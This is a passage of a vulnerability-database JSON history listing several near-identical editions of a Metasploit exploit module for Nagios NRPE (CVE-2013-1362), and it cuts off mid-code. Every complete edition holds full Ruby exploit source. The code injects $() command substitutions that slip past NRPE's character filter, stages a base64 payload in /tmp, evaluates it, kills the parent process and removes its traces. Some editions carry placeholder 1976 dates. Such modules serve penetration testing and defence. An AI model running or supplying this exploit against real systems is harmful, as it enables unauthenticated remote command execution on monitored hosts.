(NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-02T21:07:03", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-02T21:07:03", "differentElements": ["modified", "published"], "edition": 80}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-03T01:10:03", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-03T01:10:03", "differentElements": ["modified", "published"], "edition": 81}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-03T07:17:10", "history": [], "viewCount": 104, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-03T07:17:10", "differentElements": ["modified", "published"], "edition": 82}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-03T09:02:37", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-08-03T09:02:37", "differentElements": ["modified", "published"], "edition": 83}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-08-12T15:33:47", "history": [], "viewCount": 105, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = 